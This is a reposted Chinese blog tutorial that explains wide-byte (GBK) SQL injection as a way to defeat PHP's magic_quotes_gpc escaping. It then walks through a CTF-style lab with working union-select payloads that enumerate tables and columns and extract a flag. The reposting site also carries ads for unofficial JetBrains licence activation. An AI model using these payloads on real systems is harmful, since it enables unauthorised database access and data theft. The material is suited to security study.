宽字节注入(一)_低字节在前高字节在后

宽字节注入(一)_低字节在前高字节在后在PHP中有这样一个函数:magic_quotes_gpc它的作用就是将你输入的特殊字符前面统统加一个\符号如下图前2句话在看下面这条语句之前,我们首先需要知道。\’只能和\’进行闭合下面这个语句,显然不能将1进行闭合。而是将\当成了一个字符串。后面的单引号把后面的给后面的给闭合了。不能闭合,就显然不能进行SQL注入。这就是magic_quotes_gpc函数的作用了。select*fromadminwhereid=’1\’unionselect–+

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE稳定放心使用

在PHP中有这样一个函数:
magic_quotes_gpc
它的作用就是将你输入的特殊字符前面统统加一个 \ 符号

如下图前2句话

在这里插入图片描述
在看下面这条语句之前,我们首先需要知道。

\'  只能和\'进行闭合

下面这个语句,显然不能将 1 进行闭合。而是将 \ 当成了一个字符串。后面的单引号把后面的给后面的给闭合了。

不能闭合,就显然不能进行SQL注入。这就是magic_quotes_gpc函数的作用了。

select * from admin where id='1\' union select -- + '

而遇到魔术引号这哥函数,我们有2种方法,下面就来介绍宽字节注入
在这里插入图片描述

宽字节注入原理

上面我们已经知道了魔术引号的作用了,是将特殊字符前加一个 \ 符号,这样就不能闭合了。
而我们想要SQL注入的话,就必须闭合才能SQL注入。

前提条件:
数据库必须是其他编码,比如utf-8 , gbk ,不能是英语编码(ascii)就行

然后我们知道 \ 的编码为 5c 也就是一个字符,而gbk编码是占2个字符,utf-8编码是占3个字符,
这里我们就以 gbk编码来举列子,5c加上另一个字符就可以组成一个汉字,比如 d55c 就可以组成一个繁体汉字“誠”
而我们这里是URL传参,所以是 %d5%5c
在这里插入图片描述

举例

id=1%df' union select 1,2,3 — qwe 
为了绕过转义,成功闭合,只是在前面有这一点不同,其余都是以前的知识。

为了绕过转义,成功闭合,只是在前面有这一点不同,其余都是以前的知识。

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

以下是练习,可以不用看


%df' and 1=1 -- + 回显正常 %df' and 1=2 -- + 回显错误
说明存在sql注入,而且是宽字节注入

在这里插入图片描述
判断字段数

%df' order by 3 -- + 回显正常 %df' order by 4 -- + 回显错误,那就说明有3个字段

在这里插入图片描述
判断回显位

%df' union select 1,2,3 -- +

在这里插入图片描述
从上面我们知道有2个回显位
那么现在就来判断数据库版本和当前数据库
在这里插入图片描述
联合查询当前数据库里的表
这里我就不过多介绍一些数据库函数了,在显错注入(一)里有介绍

 %df' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() -- +

在这里插入图片描述
联合查询表里的字段
在这里我们很明显是为了拿flag,那么就选第一个表,其他的表就不多测试了

因为这里有魔术引号,所以不能写特殊符号,所以下面这个是错的,后面有特殊符号(单引号)

因为这里有魔术引号,所以不能写特殊符号,所以下面这个是错的,后面有特殊符号(单引号)
%df' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='china_flag' -- +

第一种方法:那么就不选表,全部输出

%df' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() -- +

在这里插入图片描述
第二种方法:如果硬要选择表的话,那就是

%df' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=(select table_name from information_schema.tables where table_schema=database() limit 0,1) -- +

在这里插入图片描述
第三种方法:因为数据库认识16进制,那么我们查询出表之后,就把表的字符转成16进制。
网站地址 https://www.bejson.com/convert/ox2str/
在这里插入图片描述
0x是16进制的标识

%df' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x6368696e615f666c6167 -- +

在这里插入图片描述
联合查询表里的字段

%df' union select 1,2,group_concat(C_Flag) from china_flag -- +

在这里插入图片描述
好了,成功拿到flag!

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/182115.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)


相关推荐

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号